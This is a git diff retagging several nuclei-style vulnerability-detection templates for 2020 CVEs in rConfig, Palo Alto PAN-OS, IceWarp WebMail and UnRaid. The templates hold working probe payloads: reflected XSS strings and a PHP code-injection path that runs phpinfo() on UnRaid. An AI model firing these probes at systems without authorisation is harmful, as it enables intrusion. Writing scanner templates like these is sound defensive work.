misc changes

cves/2020/CVE-2020-10546.yaml

@@ -4,7 +4,7 @@ info:
   author: madrobot
   severity: high
   reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10546
-  tags: SQLI
+  tags: cve,cve2020,rconfig,sqli
 
 requests:
   - method: GET

cves/2020/CVE-2020-10547.yaml

@@ -4,7 +4,7 @@ info:
   author: madrobot
   severity: high
   reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10547
-  tags: SQLI
+  tags: cve,cve2020,rconfig,sqli
 
 requests:
   - method: GET

cves/2020/CVE-2020-10548.yaml

@@ -4,7 +4,7 @@ info:
   author: madrobot
   severity: high
   reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10548
-  tags: SQLI
+  tags: cve,cve2020,rconfig,sqli
 
 requests:
   - method: GET

cves/2020/CVE-2020-10549.yaml

@@ -4,7 +4,7 @@ info:
   author: madrobot
   severity: high
   reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10549
-  tags: SQLI
+  tags: cve,cve2020,rconfig,sqli
 
 requests:
   - method: GET

cves/2020/CVE-2020-2036.yaml

@@ -1,21 +1,29 @@
 id: CVE-2020-2036
 info:
-  name: Palo Alto Networks Reflected Cross Site Scripting
+  name: Palo Alto Networks Reflected XSS
   author: madrobot
   severity: medium
   reference: https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/
-  tags: XSS
+  tags: cve,cve2020,vpn,xss
+
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E"
       - "{{BaseURL}}/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E"
+
     matchers-condition: and
     matchers:
       - type: status
         status:
           - 200
+
       - type: word
         words:
           - "<svg/onload=alert(1)>"
         part: body
+
+      - type: word
+        words:
+          - "text/html"
+        part: header

cves/2020/CVE-2020-27982.yaml

@@ -4,18 +4,25 @@ info:
   author: madrobot
   severity: medium
   reference: https://packetstormsecurity.com/files/159763/Icewarp-WebMail-11.4.5.0-Cross-Site-Scripting.html
-  tags: XSS
+  tags: cve,cve2020,xss,icewarp
 
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E"
+
     matchers-condition: and
     matchers:
       - type: status
         status:
           - 200
+
       - type: word
         words:
           - "<img src=x onerror=alert(1)>"
         part: body
+
+      - type: word
+        words:
+          - "text/html"
+        part: header

cves/2020/CVE-2020-5847.yaml

@@ -1,15 +1,16 @@
 id: CVE-2020-5847
 info:
-  name: UnRaid  Remote Code Execution
+  name: UnRaid Remote Code Execution
   author: madrobot
   severity: high
   reference: https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/
-  tags: Directory Traversal
+  tags: cve,cve2020,rce
 
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20phpinfo();%20?%3E"
+
     matchers-condition: and
     matchers:
       - type: status
@@ -17,5 +18,6 @@ requests:
           - 200
       - type: word
         words:
-          - "http://www.php.net/"
+          - "PHP Extension"
-        part: body
+          - "PHP Version"
+        condition: and

cves/2020/CVE-2020-9425.yaml

@@ -3,8 +3,8 @@ info:
   name: rConfig Unauthenticated Sensitive Information Disclosure
   author: madrobot
   severity: high
-  reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9425
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2020-9425
-  tags: Information Disclosure
+  tags: cve,cve2020,rconfig
 
 requests:
   - method: GET
@@ -19,4 +19,5 @@ requests:
         words:
           - "defaultNodeUsername"
           - "defaultNodePassword"
+        condition: and
         part: body